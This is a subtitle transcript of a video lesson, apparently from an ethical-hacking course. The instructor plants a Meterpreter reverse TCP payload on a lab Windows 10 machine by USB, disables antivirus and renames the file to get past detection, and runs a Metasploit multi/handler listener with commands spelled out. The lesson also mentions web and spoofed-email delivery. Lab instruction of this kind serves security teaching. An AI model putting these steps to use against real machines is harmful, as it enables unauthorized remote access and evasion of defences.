1
00:00:00,240 --> 00:00:02,360
Hello everybody and welcome back.

2
00:00:02,370 --> 00:00:06,470
And now let us finally exploit our Windows 10 machine.

3
00:00:06,540 --> 00:00:11,100
So, first of all, we created the payload with this command right here.

4
00:00:11,100 --> 00:00:18,030
We encoded it with this encoder right here with five iterations. We named it reverse1.exe.

5
00:00:18,690 --> 00:00:20,450
The LHOST that we specified,

6
00:00:20,460 --> 00:00:24,570
let me just close this, is our IP address, and the LPORT is 4444.

7
00:00:25,230 --> 00:00:31,510
So, what we want to do right now is deliver this payload to our victim.

8
00:00:31,560 --> 00:00:38,320
Now, for the first time, we will do that over a USB drive, which is the easiest and simplest way.

9
00:00:38,360 --> 00:00:43,630
Now, for this attack to work, you will need to have physical access to the victim's computer.

10
00:00:43,730 --> 00:00:49,520
Later on I will show you how you can do that over e-mail, and how you can spoof fake e-mails and send

11
00:00:49,790 --> 00:00:53,090
them to anyone you want with the payload itself.

12
00:00:53,090 --> 00:00:57,150
So, first of all, what we want to do is plug

13
00:00:57,150 --> 00:00:59,220
your USB drive into your PC.

14
00:00:59,240 --> 00:01:03,110
So just plug it in.

15
00:01:03,110 --> 00:01:04,340
Let me just...

16
00:01:04,340 --> 00:01:04,980
OK.

17
00:01:05,180 --> 00:01:07,370
So my USB drive is

18
00:01:07,370 --> 00:01:08,050
plugged in.

19
00:01:09,140 --> 00:01:12,650
But you will notice that it will be detected on your main PC.

20
00:01:12,650 --> 00:01:18,770
Now, in order for you to detect it on the Kali Linux machine, what you want to do is go to Devices right

21
00:01:18,770 --> 00:01:22,800
here. So click on Devices, go to USB,

22
00:01:22,940 --> 00:01:25,520
and here you want to find your USB drive.

23
00:01:25,520 --> 00:01:30,070
So for me this is the Kingston DataTraveler 3.0.

24
00:01:30,590 --> 00:01:34,940
And if you click on it you will see, if you go once again right here, that now it is connected to your

25
00:01:34,940 --> 00:01:39,250
Kali Linux machine. So, in order for you to actually use it,

26
00:01:39,280 --> 00:01:46,070
this should pop up, and you just click on Open with Files, and it will open your Kali Linux drive.

27
00:01:46,750 --> 00:01:47,270
Pardon me,

28
00:01:47,310 --> 00:01:53,420
your USB drive. And all you want to do from there is basically just copy your reverse1.exe,

29
00:01:53,470 --> 00:01:59,800
or your payload, however you named it, to your USB drive. And simply just paste it into the USB.

30
00:01:59,830 --> 00:02:06,670
So my payload is in the root directory. So if I just type here in the root directory,

31
00:02:06,960 --> 00:02:12,830
let me just delete the other two. So reverse.exe we do not need, and shell.exe we do not need.

32
00:02:12,940 --> 00:02:17,400
So, we only want to copy reverse1.exe, which is our final payload.

33
00:02:17,800 --> 00:02:26,410
So let us do that by using the cp command in the terminal, and then we specify the file, which is reverse1.exe.

34
00:02:26,410 --> 00:02:28,480
And where we want it to go

35
00:02:28,480 --> 00:02:35,680
is /media/root, and then just press Tab to select your Kali Linux drive.

36
00:02:35,680 --> 00:02:41,290
Now, if you do not want to copy it like this, you can basically just go to Applications or,

37
00:02:41,290 --> 00:02:47,560
pardon me, to Places. Then you want to go to Computer. Then basically just find your root directory.

38
00:02:47,950 --> 00:02:57,910
So let me just find it, the root directory. Just click Copy right here, and you can paste it right here. And

39
00:02:57,910 --> 00:03:04,550
that's how you can paste the file. Or you can use this command right here.

40
00:03:04,550 --> 00:03:09,550
So basically what you want to do after this, so /media/root, just press the Tab button here, and it

41
00:03:09,610 --> 00:03:13,840
automatically selects it if you only have one USB drive plugged in, which you most likely do.

42
00:03:14,470 --> 00:03:19,270
So, we will not run this since I already copied it. What we want to do right now is just click here on

43
00:03:19,270 --> 00:03:25,510
this arrow in order to unmount the USB. After that, let me just close all of this. And what I want to

44
00:03:25,510 --> 00:03:30,060
do right now is unplug it from my Kali Linux machine.

45
00:03:30,070 --> 00:03:37,060
So just click right here, and right now it will be plugged into my Windows 10 machine.

46
00:03:37,060 --> 00:03:43,620
So what I want to do is copy and paste this file onto my desktop, or wherever you basically want. You need

47
00:03:43,620 --> 00:03:44,850
to provide administrator...

48
00:03:44,860 --> 00:03:45,360
OK.

49
00:03:46,210 --> 00:03:51,050
So we copy the file... but let me see.

50
00:03:51,470 --> 00:03:54,620
Why doesn't it want to? OK.

51
00:03:54,630 --> 00:03:57,060
So, first thing.

52
00:03:57,710 --> 00:03:58,500
So this will happen.

53
00:03:58,500 --> 00:04:03,780
So, the first thing that you want to do basically is, first of all, let me just delete it since this will not

54
00:04:03,870 --> 00:04:05,030
work.

55
00:04:05,160 --> 00:04:11,130
The reason why is, first of all, you need to disable two things, since this is a well-known payload.

56
00:04:11,190 --> 00:04:13,860
You need to disable your antivirus if you have it.

57
00:04:13,860 --> 00:04:18,810
So for me that is Bitdefender. I will just click on it,

58
00:04:18,840 --> 00:04:26,130
so this is my antivirus, you open your antivirus, and what you want to do is basically just turn off the protection

59
00:04:26,130 --> 00:04:26,640
for it.

60
00:04:27,150 --> 00:04:33,850
So right now I will be able to transfer my virus in order for it to not get deleted, since my device

61
00:04:33,850 --> 00:04:35,010
is at risk.

62
00:04:35,010 --> 00:04:42,210
Now you will do the same with your antivirus, and you also need to do the same

63
00:04:42,210 --> 00:04:44,010
with Windows Defender.

64
00:04:44,130 --> 00:04:48,590
Now, I already had that turned off, so let me just repeat the process.

65
00:04:48,600 --> 00:04:49,770
I will do it real fast.

66
00:04:49,770 --> 00:04:55,830
So, cp reverse1.exe into /media/root and then the Kali drive.

67
00:04:55,830 --> 00:05:03,540
So now I want to change my directory. As we can see, the item was deleted since it detected it as a Trojan,

68
00:05:03,540 --> 00:05:06,870
as we can see right here.

69
00:05:06,960 --> 00:05:10,440
That's why I couldn't run the file or copy it to the desktop.

70
00:05:10,440 --> 00:05:16,910
But right now, if I go to my Kali Linux drive and I use the,

71
00:05:16,990 --> 00:05:22,900
let me just rename the file to shell.exe so it isn't named reverse1.exe.

72
00:05:23,310 --> 00:05:25,800
And we need to do the same thing

73
00:05:26,160 --> 00:05:28,680
as the previous time, so unmount the USB drive.

74
00:05:28,680 --> 00:05:31,120
So just uncheck it right here.

75
00:05:31,320 --> 00:05:33,720
Now let's try to copy the file once again.

76
00:05:34,350 --> 00:05:38,270
So now, as you can see, it works, so the file is right here.

77
00:05:38,500 --> 00:05:43,260
We do not need this USB drive anymore, or we will just leave it. It doesn't really matter.

78
00:05:43,420 --> 00:05:50,090
And the next thing you want to do before you actually run this file is actually start up your listener.

79
00:05:50,320 --> 00:05:50,870
Now,

80
00:05:51,530 --> 00:05:54,820
let me change my directory to root and run msfconsole.

81
00:05:55,070 --> 00:05:56,050
So,

82
00:05:56,090 --> 00:06:01,740
as I said, you want to use your LHOST IP address and the LPORT that you specified in the payload itself.

83
00:06:01,760 --> 00:06:07,390
Now, one more thing to note is that you do not need to deliver the

84
00:06:07,430 --> 00:06:09,250
payload on the USB drive,

85
00:06:09,320 --> 00:06:11,870
you can also download it over Apache2.

86
00:06:12,290 --> 00:06:17,510
But I found this simple. You can just start Apache2, then copy the payload into the /var/www/html

87
00:06:17,510 --> 00:06:23,840
folder, and just open up your IP address from the Windows 10 machine in the Google search

88
00:06:23,840 --> 00:06:26,070
bar, and just click on the file to download it.

89
00:06:26,090 --> 00:06:30,820
That is another way to do it. But we will do it over the USB drive now, since we already did it.

90
00:06:30,830 --> 00:06:41,120
Now, once you open the msfconsole, what you want to do is use exploit/multi/handler, and what you want

91
00:06:41,120 --> 00:06:47,830
to do is set the payload that you used in the process of making the payload with msfvenom.

92
00:06:47,870 --> 00:06:54,260
Now, we used Windows x64 Meterpreter reverse TCP, so we want to set that payload as well. So set payload

93
00:06:54,830 --> 00:07:00,380
windows/x64/meterpreter/reverse_tcp.

94
00:07:01,340 --> 00:07:05,560
So the next thing, we want to show options and set our LHOST.

95
00:07:05,560 --> 00:07:11,860
Now, our LHOST is .1.4, I believe. It has to be the same as in the payload specification.

96
00:07:11,880 --> 00:07:16,230
So, set LHOST 192.168.1.4.

97
00:07:17,050 --> 00:07:23,250
And right now, show options once again in order to double-check it all: we have set windows/x64/meterpreter/reverse_tcp

98
00:07:23,290 --> 00:07:28,850
as the payload, our LPORT is the same as in the specification of our payload,

99
00:07:28,880 --> 00:07:31,400
and our LHOST is our IP address.

100
00:07:31,460 --> 00:07:34,280
The only thing you want to do right now is type exploit.

101
00:07:34,360 --> 00:07:39,410
Now, in order to run the exploit as a background process you can just type exploit

102
00:07:39,410 --> 00:07:46,080
-j -z, and this is the process listening in the background. So you will still be able to execute commands,

103
00:07:46,110 --> 00:07:50,350
so show options and all of that, instead of just waiting for the connection.

104
00:07:50,420 --> 00:07:56,330
Now, in order to close that process you can just type jobs here and it will say that

105
00:07:56,360 --> 00:08:02,060
the jobs currently running are the exploit multi/handler, listening on this IP address right

106
00:08:02,060 --> 00:08:03,600
here, and on this port.

107
00:08:04,100 --> 00:08:08,990
So, the only thing we need to do right now is actually open this file.

108
00:08:08,990 --> 00:08:15,770
Now, if you deliver this file over a USB drive, you can just double-click it and it will open. But if you

109
00:08:15,770 --> 00:08:24,500
download the file from the Internet, or from Apache2, or via e-mail, or via anything else,

110
00:08:24,890 --> 00:08:28,730
it will ask for permission to run it. It will ask

111
00:08:28,730 --> 00:08:32,690
are you sure you want to run this file, since it is a .exe file.

112
00:08:32,690 --> 00:08:37,520
It is an executable, and it will do this for every executable you download over the Internet.

113
00:08:37,550 --> 00:08:41,050
It will ask do you want to run it, since it is an executable file.

114
00:08:41,180 --> 00:08:45,830
But since we delivered it over a USB, we can just double-click it and it will run

115
00:08:45,860 --> 00:08:49,790
for us. It will not ask anything else, and it will just open.

116
00:08:49,940 --> 00:08:55,340
But if I go right here to my Kali Linux machine, you will see that we got Meterpreter session 1

117
00:08:55,400 --> 00:09:02,780
open on our local listening address to the Windows 10 machine, which is .1.3, on

118
00:09:02,780 --> 00:09:03,450
this port.

119
00:09:03,470 --> 00:09:09,140
So if I just press Enter here, in order for you to enter this session, since we are doing this for the

120
00:09:09,140 --> 00:09:14,610
first time, what you want to type in your Metasploit is basically just sessions, and then it will

121
00:09:14,610 --> 00:09:17,820
list all of the sessions that you currently have. Now,

122
00:09:17,990 --> 00:09:22,550
at the moment we only have the session with our Windows 10 machine, since that is the only machine that we

123
00:09:22,550 --> 00:09:23,710
have attacked so far.

124
00:09:23,840 --> 00:09:26,300
In order for you to enter that session, what you want to do,

125
00:09:26,480 --> 00:09:29,610
let me just clear this so you can see it better,

126
00:09:29,680 --> 00:09:31,750
you can see this ID number 1.

127
00:09:32,270 --> 00:09:36,770
So once you type sessions it will print out all of the sessions, and you can see that the session ID

128
00:09:36,860 --> 00:09:44,870
is number 1. In order for you to enter it, just type session -i and then 1 here. Oops...

129
00:09:44,890 --> 00:09:47,020
I think it's sessions -i and then 1.

130
00:09:47,170 --> 00:09:48,950
Okay, so we will just add an s.

131
00:09:48,970 --> 00:09:57,700
So sessions -i and then 1, and we can see we successfully got our Meterpreter shell open. Now,

132
00:09:57,910 --> 00:10:05,170
this is the first time, so what we want to do right now is basically just run the help command,

133
00:10:05,200 --> 00:10:11,020
since we do not know what we can run, and the help command will print out all of our available options

134
00:10:11,020 --> 00:10:14,030
for the Metasploit Framework Meterpreter shell.

135
00:10:14,080 --> 00:10:19,000
So in order, for example, to check who we are, we can just type here

136
00:10:20,000 --> 00:10:25,140
getuid, and it will say that this is the user that we currently are.

137
00:10:25,220 --> 00:10:31,940
So, we will notice that we are not the administrator, which we will fix in the post-exploitation

138
00:10:32,600 --> 00:10:38,870
videos, where I will show you what else you can run, how you can elevate privileges, how you can get

139
00:10:38,870 --> 00:10:43,590
passwords, how you can upload/download files, and what else you can do.

140
00:10:43,730 --> 00:10:45,730
But for now this will be good.

141
00:10:45,740 --> 00:10:52,730
So, for example, if I type ifconfig, you will see that my IP address is 192.168.1.8 and

142
00:10:52,730 --> 00:10:55,850
it is also 192.168.1.3.

143
00:10:55,970 --> 00:10:58,670
Now you might be asking, how do I have two IP addresses?

144
00:10:58,670 --> 00:11:06,290
Well, that is because I have a wireless network interface and a cable interface on my Windows

145
00:11:06,430 --> 00:11:07,360
10 machine.

146
00:11:07,400 --> 00:11:12,320
So I basically have two interfaces running and connected to the Internet at the moment. One of them,

147
00:11:12,350 --> 00:11:18,980
as you can see, is the wireless network adapter, which is at .1.8, and the other one is simply

148
00:11:19,010 --> 00:11:22,050
over cable, which is .1.3.

149
00:11:22,070 --> 00:11:31,150
So, this is the one. And you can also, for example, check some other commands...

150
00:11:32,770 --> 00:11:33,720
let me just type help

151
00:11:34,120 --> 00:11:35,770
so we can see what else we can run.

152
00:11:35,770 --> 00:11:38,580
I believe you can check the ARP tables as well.

153
00:11:38,590 --> 00:11:43,750
So you just type arp here, yeah. There are a bunch of other commands, and a bunch of other modules,

154
00:11:43,750 --> 00:11:46,650
that we will also start running in the next video.

155
00:11:47,290 --> 00:11:53,260
But for now we just wanted to get the session opened, and I will continue showing you what you can do in

156
00:11:53,260 --> 00:11:54,340
the next video.

157
00:11:54,340 --> 00:11:56,400
So I hope I see you there, and take care.

158
00:11:56,470 --> 00:11:56,970
Bye!